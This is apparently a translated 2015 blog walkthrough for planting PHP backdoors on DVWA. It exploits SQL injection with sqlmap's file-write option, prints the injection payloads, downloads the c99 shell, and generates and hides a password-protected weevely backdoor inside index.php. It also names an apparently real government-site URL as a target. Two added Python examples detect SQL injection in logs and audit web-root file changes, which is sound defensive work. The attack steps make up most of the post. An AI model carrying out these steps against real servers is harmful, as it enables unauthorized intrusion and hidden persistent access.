Thursday, 03 September 2015

EXPLOIT DVWA AND UPLOAD A HIDDEN BACKDOOR

1.target.go.id/idex.php?id_berita=12&
Open a terminal.

1.1 ┌─[budhya@parrot]─[~]
└──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                 


       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

┌─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l simple.txt
Open a new terminal.

┌─[✗]─[root@parrot]─[/home/budhya]

└──╼ #cd /usr/share/webshells/php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #ls
findsock.c  php-backdoor.php  php-findsock-shell.php  php-reverse-shell.php  qsd-php-backdoor.php  simple-backdoor.php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #

Next, copy file 2:
└──╼ #cp php-backdoor.php ~
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #
Next, check that the copy finished:
┌─[root@parrot]─[~]
└──╼ #pwd
/root
┌─[root@parrot]─[~]
└──╼ #ls
12 hari kmaren  Desktop          maltego_3.6.1.6748-0kali2_all.deb  New Graph (1).mtgx  sessions          Videos
9844.py         Documents        MaltegoChlorineCE.3.6.0.6640.deb   New Graph (2).mtgx  Templates         VirtualBox VMs
abuy.php        Downloads        Metasploitable2-Linux              php-backdoor.php    tmp.php           vpngate_vpn239494852.opengw.net_udp_1947.ovpn
abuy.py         HARI 8           Music                              Pictures            TUGAS MLAM INI .  vpngate_vpn800695980.opengw.net_udp_1605.ovpn
blackhat.jpg    malam ini tugas  NewFolder                          Public              ub 10.04.vdi      Wireles hacking
┌─[root@parrot]─[~]
└──╼ #

Next step: upload the backdoor.
┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l /home/budhya/dvwaheader.txt -p "id" --file-write=/root/php-backdoor.php --file-dest=/www/dvwa/hackable/uploads/abouy.php
If the backdoor has been uploaded successfully, a notification appears in the terminal:

Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=gdyvv' AND (SELECT 2276 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (CASE WHEN (2276=2276) THEN 1 ELSE 0 END)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GfHD'='GfHD&Submit=Submit


    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=gdyvv' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x426b64424b7872745956,0x7176707171)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=gdyvv' AND (SELECT * FROM (SELECT(SLEEP(5)))vTIN) AND 'qWtS'='qWtS&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n]
[22:01:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[22:01:48] [INFO] fingerprinting the back-end DBMS operating system
[22:01:49] [WARNING] reflective value(s) found and filtering out
[22:01:49] [INFO] the back-end DBMS operating system is Linux
[22:01:49] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file '/root/php-backdoor.php' has been successfully written on the back-end DBMS file system (/var/www/dvwa/hackable/uploads/abouy.php)? [Y/n]
[22:01:50] [INFO] the remote file /var/www/dvwa/hackable/uploads/abouy.php is larger than the local file /root/php-backdoor.php
[22:01:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09032015_1001pm.csv'
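
The three injection types in the sqlmap output above, and the file write that follows them, leave recognisable traces in the web server's access log. This added example (not part of the original post) scans constructed log lines for them; the log lines, client addresses, the sample.php name and the tag names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges); not from the original post.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Sep/2015:22:01:40 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4821
192.0.2.10 - - [03/Sep/2015:22:01:42 +0700] "GET /dvwa/vulnerabilities/sqli/?id=x%27%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),FLOOR(RAND(0)*2)x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27a%27=%27a&Submit=Submit HTTP/1.1" 200 4900
192.0.2.10 - - [03/Sep/2015:22:01:44 +0700] "GET /dvwa/vulnerabilities/sqli/?id=x%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x71,0x41,0x71)%23&Submit=Submit HTTP/1.1" 200 4890
192.0.2.10 - - [03/Sep/2015:22:01:46 +0700] "GET /dvwa/vulnerabilities/sqli/?id=x%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20%27b%27=%27b&Submit=Submit HTTP/1.1" 200 4821
192.0.2.10 - - [03/Sep/2015:22:01:49 +0700] "GET /dvwa/vulnerabilities/sqli/?id=x%27%20UNION%20ALL%20SELECT%20NULL,0x41%20INTO%20DUMPFILE%20%27/var/www/dvwa/hackable/uploads/sample.php%27%23&Submit=Submit HTTP/1.1" 200 4821
192.0.2.10 - - [03/Sep/2015:22:02:10 +0700] "GET /dvwa/hackable/uploads/sample.php HTTP/1.1" 200 312
198.51.100.7 - - [03/Sep/2015:22:03:00 +0700] "GET /dvwa/hackable/uploads/dvwa_email.png HTTP/1.1" 200 667
"""

# One pattern per technique named in the sqlmap output, plus MySQL file writes.
SIGNATURES = {
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(|information_schema", re.I),
    "union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time-based": re.compile(r"\bsleep\s*\(\s*\d+", re.I),
    "file-write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
}
UPLOADED_SCRIPT = re.compile(r"/uploads/[^/\s]+\.(php\d?|phtml)$", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan(log_text):
    """Return {client: sorted tags}. 'webshell-suspect' means the client sent a
    file-write injection and later got a 200 for a script under uploads/."""
    findings = {}
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, raw, status = m.groups()
        url = unquote_plus(raw)                      # undo URL encoding first
        path = unquote_plus(raw.split("?", 1)[0])    # request path only
        tags = findings.setdefault(client, set())
        tags.update(name for name, rx in SIGNATURES.items() if rx.search(url))
        if status == "200" and UPLOADED_SCRIPT.search(path):
            tags.add("script-in-uploads")
            if "file-write" in tags:
                tags.add("webshell-suspect")
    return {c: sorted(t) for c, t in findings.items() if t}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

GET parameters appear in the access log; for POST-based injection the same patterns have to be applied to request bodies captured by a WAF or proxy.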

Next, the backdoor upload is processed.

Then the backdoor upload is finished.

Next, check in DVWA that the backdoor was uploaded, then run the backdoor.
Search for the name of the uploaded backdoor.
In this simple example the uploaded backdoor is named abuy.
Next, type touch and press Enter, then ls to look at the directory.

For this step, get a new backdoor from
http://www.r57shell.net/: from this site, download the backdoor named c99hell, then choose Extract Here and open it.

Once the backdoor has been downloaded, extracted and renamed, upload it again in DVWA.


After opening and extracting, rename the file; in my example it is renamed to jagotarung.php. When the upload of backdoor 2 is finished, browse to
 http://192.168.1.123/dvwa/jagotarung.php
Next you must delete backdoor 1, for the safety of backdoor 2:
go to hackable, upload, tick the file, choose With selected: Delete, and confirm.


Next, a simple edit in the HTML: rename WELCOME to FOR JAGO TARUNG.
Next, hide your backdoor for safety.
Open a new terminal and type:
┌─[root@parrot]─[/home/budhya]
└──╼ # weevely generate 12345 tarung.php
Then press Enter; if it succeeds, this appears:
[generate.php] Backdoor file 'tarung.php' created with password '12345'

 ┌─[root@parrot]─[/home/budhya]
└──╼ #cat tarung.php
<?php
Next, copy the file text, the part highlighted in the image,
and paste it into the editor in the DVWA backdoor.
Then SAVE and look at the terminal.
Copy the URL and type it in the terminal:
http://192.168.1.123/dvwa/index.php 12345 (12345 is the password)
To look for your hidden file, type ls. Finished.
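
The steps above leave three kinds of change in the web root: a script in hackable/uploads, a new script beside index.php, and an edited index.php, and a scan for new files alone misses the last one. This added example (not from the original post) compares the tree with a hash baseline taken at deploy time; the file contents and the function names are constructed for illustration.

```python
import hashlib
import os
import tempfile

SCRIPT_EXT = (".php", ".phtml", ".php5")

def snapshot(root):
    """Map each file path (relative to root, '/'-separated) to its SHA-256."""
    digests = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(folder, name)
            with open(full, "rb") as fh:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def audit(baseline, root, upload_dirs=("hackable/uploads",)):
    """Compare the tree at root with baseline; return sorted (finding, path)."""
    current = snapshot(root)
    findings = [("removed", p) for p in baseline if p not in current]
    for path, digest in current.items():
        if path not in baseline:
            findings.append(("added", path))
        elif baseline[path] != digest:
            findings.append(("modified", path))
        in_uploads = any(path.startswith(d + "/") for d in upload_dirs)
        if in_uploads and path.lower().endswith(SCRIPT_EXT):
            findings.append(("script-in-upload-dir", path))
    return sorted(findings)

def demo():
    """Constructed web root: take a baseline, then apply the post's changes."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "hackable", "uploads"))
        def write(rel, text):
            with open(os.path.join(root, *rel.split("/")), "w") as fh:
                fh.write(text)
        write("index.php", "<?php echo 'Welcome'; ?>")
        write("hackable/uploads/dvwa_email.png", "constructed image bytes")
        baseline = snapshot(root)  # taken at deploy time
        write("hackable/uploads/abouy.php", "placeholder: uploaded script")
        write("jagotarung.php", "placeholder: second uploaded script")
        write("index.php", "<?php /* placeholder: pasted code */ echo 'Welcome'; ?>")
        return audit(baseline, root)

if __name__ == "__main__":
    print(demo())
```

Keep the baseline somewhere the web server account cannot write, otherwise whoever alters the tree can alter the manifest as well.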
